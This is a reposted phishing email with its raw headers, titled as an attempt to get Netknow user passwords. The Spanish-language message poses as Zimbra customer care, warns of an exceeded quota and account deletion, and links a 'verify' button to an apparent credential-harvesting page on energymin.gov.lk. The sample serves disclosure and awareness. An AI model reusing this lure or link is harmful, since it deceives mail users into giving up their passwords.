Phishing attempt to get Netknow user passwords

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Sun, 15 May 2022 05:11:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))

(envelope-from )

id 1nqC8i-0004DS-8e

for dave@doctor.nl2k.ab.ca;

Sun, 15 May 2022 05:10:20 -0600

Resent-From: The Doctor

Resent-Date: Sun, 15 May 2022 05:10:20 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from serv.boliviatv.bo ([190.129.69.244]:39320)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.95 (FreeBSD))

(envelope-from )

id 1nq2FF-000DHk-81

for doctor@doctor.nl2k.ab.ca;

Sat, 14 May 2022 18:36:45 -0600

Received: from localhost (localhost [127.0.0.1])

by serv.boliviatv.bo (Postfix) with ESMTP id E650E607F6CB0;

Sat, 14 May 2022 17:22:26 -0400 (-04)

Received: from serv.boliviatv.bo ([127.0.0.1])

by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10032)

with ESMTP id vGBtr8cxBOiE; Sat, 14 May 2022 17:22:22 -0400 (-04)

Received: from localhost (localhost [127.0.0.1])

by serv.boliviatv.bo (Postfix) with ESMTP id CBFED60645D58;

Sat, 14 May 2022 16:37:03 -0400 (-04)

DKIM-Filter: OpenDKIM Filter v2.10.3 serv.boliviatv.bo CBFED60645D58

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=boliviatv.bo;

s=ACDE6D5E-6CEE-11EC-87BA-9154AF63F819; t=1652560623;

bh=T1iTR1MtBnuKLlqe0Z6qD/PLq2i2RTakkd78GTwxZGo=;

h=MIME-Version:To:From:Date:Message-Id;

b=F7md0+ugwjItAYLX4hKQq/7Lq2TCrNY3/NVSRzpD0eUy+FSVBy62vjBFPnvyNJ/J4

R+BIS8l5lG2zjlJvdpHMcgTnjj9W9SbevOu+j7r2tq4vxwjNdFQpsRz9+wsHq9ec5L

uG6IrqXiN49nkDHR3sNOhkrnXPfLNUR+t691iAQMkvQJ0fZZUzdf4GmCYvnNGl+pzT

TKPfeG0owji/bRG8UDsqkNFmZ5T+3K+WnMO8i2A6466HyEAavF1daoA+H+zKARilw5

ZG76QldHaYQRn75F2W9eO3tB5IJCnRdtFbR1Xfj6ZP2R09wDDF83yIT0klQ+MEeHx7

QCUUkO01KLnZQ==

X-Virus-Scanned: amavisd-new at boliviatv.bo

Received: from serv.boliviatv.bo ([127.0.0.1])

by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10026)

with ESMTP id ADNQPb6YzdSU; Sat, 14 May 2022 16:37:03 -0400 (-04)

Received: from [103.1.179.201] (unknown [103.1.179.201])

by serv.boliviatv.bo (Postfix) with ESMTPSA id 0D5656067BE9B;

Sat, 14 May 2022 16:09:14 -0400 (-04)

Content-Type: multipart/alternative; boundary="===============1187788901=="

MIME-Version: 1.0

Subject: Verify your account

To: Recipients

From: "Zimbra"

Date: Sun, 15 May 2022 01:39:05 +0530

Message-Id: <20220514200915.0D5656067BE9B@serv.boliviatv.bo>



You will not see this in a MIME-aware mail reader.

--===============1187788901==

Content-Type: text/plain; charset="iso-8859-1"

MIME-Version: 1.0

Content-Transfer-Encoding: quoted-printable

Content-Description: Mail message body



Estimados usuarios de correo de Zimbra: =



Su cuenta ha superado el l=EDmite de cuota establecido por el administrado=

r y es posible que no pueda enviar o recibir correo nuevo hasta que vuelva =

a validar su cuenta.

=



=



=





Para volver a validar su cuenta, =



=



=



HAGA CLIC AQU=CD PARA VERIFICAR



=



haga clic en el enlace de arriba para verificar =



Si no lo verifica, su cuenta se desactivar=E1 permanentemente y se elimina=

r=E1 de nuestra base de datos.

=A92022 Zimbra Customer Care C

--===============1187788901==

Content-Type: text/html; charset="iso-8859-1"

MIME-Version: 1.0

Content-Transfer-Encoding: quoted-printable

Content-Description: Mail message body




=3Diso-8859-1"/>

imes new roman", "new york", times, serif; WHITE-SPACE: normal; WORD-SPACIN=

G: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STY=

LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px=

; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s=

troke-width: 0px; text-decoration-thickness: initial; text-decoration-style=

: initial; text-decoration-color: initial'>Estimados usuarios de correo de =

Zimbra:



times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none;=

FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOW=

S: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: nor=

mal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decora=

tion-thickness: initial; text-decoration-style: initial; text-decoration-co=

lor: initial'>



k", times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=

one; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; =

ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; =

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial'>Su cuenta ha sup=

erado el l=EDmite de cuota establecido por el administrador y es posible qu=

e no pueda enviar o recibir correo nuevo hasta que vuelva a validar su cuen=

ta.




HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=

00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=

ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=

nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=

initial; text-decoration-style: initial; text-decoration-color: initial">


d; BORDER-RIGHT: rgb(187,187,187) 1px dashed; BORDER-COLLAPSE: collapse; BO=

RDER-BOTTOM: rgb(187,187,187) 1px dashed; BORDER-LEFT: rgb(187,187,187) 1px=

dashed">








FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(240,240,24=

0) 1pt inset; WIDTH: 105.85pt; BACKGROUND: red; BORDER-BOTTOM: rgb(240,240,=

240) 1pt solid; PADDING-BOTTOM: 0cm; PADDING-TOP: 0cm; PADDING-LEFT: 5.4pt;=

BORDER-LEFT: rgb(240,240,240) 1pt solid; PADDING-RIGHT: 5.4pt" width=3D141>


GIN-RIGHT: 0px">
verdana, sans-serif">
 


FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(187,187,18=

7) 1pt solid; WIDTH: 35.4pt; BACKGROUND-IMAGE: none; BACKGROUND-REPEAT: rep=

eat; BORDER-BOTTOM: rgb(187,187,187) 1pt solid; BACKGROUND-POSITION: 0% 0%;=

PADDING-BOTTOM: 0cm; PADDING-TOP: 0cm; PADDING-LEFT: 5.4pt; BORDER-LEFT: r=

gb(187,187,187); PADDING-RIGHT: 5.4pt" width=3D47>


GIN-RIGHT: 0px">
serif">
 




HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=

00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=

ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=

nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=

initial; text-decoration-style: initial; text-decoration-color: initial">

Para volver a validar su cuenta,






HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=

00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=

ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=

nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=

initial; text-decoration-style: initial; text-decoration-color: initial"><=

BR>


87,187) 1px dashed; BORDER-RIGHT: rgb(187,187,187) 1px dashed; WIDTH: 300px=

; BORDER-BOTTOM: rgb(187,187,187) 1px dashed; PADDING-BOTTOM: 0px; PADDING-=

TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(187,187,187) 1px dashed; MARG=

IN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(8,75,138); border-radius=

: 5px">






-FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(187,187,1=

87) 1px dashed; BORDER-BOTTOM: rgb(187,187,187) 1px dashed; PADDING-BOTTOM:=

0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(187,187,187) 1p=

x dashed; PADDING-RIGHT: 0px">
ACKGROUND: none transparent scroll repeat 0% 0%; OUTLINE-WIDTH: medium; PAD=

DING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px;=

MARGIN: 0px; PADDING-RIGHT: 0px" href=3D"http://energymin.gov.lk/mail1.php=

" rel=3D"nofollow%20noopener%20nofollow%20noopener%20noreferrer nofollow no=

opener noreferrer nofollow noopener noreferrer nofollow noopener noreferrer=

noreferrer noreferrer noreferrer noreferrer noreferrer" target=3D_blank>
PAN style=3D"COLOR: rgb(255,255,255)">
sans-serif">HAGA CLIC AQU=CD PARA VERIFICAR
=





HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=

00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=

ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=

nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=

initial; text-decoration-style: initial; text-decoration-color: initial"><=

BR>



E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=

: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=

rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =

normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=

text-decoration-style: initial; text-decoration-color: initial'>haga clic =

en el enlace de arriba para verificar



E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=

: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=

rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =

normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=

text-decoration-style: initial; text-decoration-color: initial'>



k", times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=

one; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; =

ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; =

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial'>Si no lo verific=

a, su cuenta se desactivar=E1 permanentemente y se eliminar=E1 de nuestra b=

ase de datos.




E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=

: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=

rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =

normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=

text-decoration-style: initial; text-decoration-color: initial'>
e=3D"FONT-SIZE: 12pt">
 



E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=

: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=

rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =

normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=

text-decoration-style: initial; text-decoration-color: initial'>
e=3D"FONT-SIZE: 12pt; FONT-FAMILY: arial, helvetica, sans-serif; WHITE-SPAC=

E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=

: rgb(0,0,0); FONT-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR:=

rgb(255,255,255); TEXT-INDENT: 0px">
=A92022 Zimbra Customer Care 
SPAN>
C

--===============1187788901==--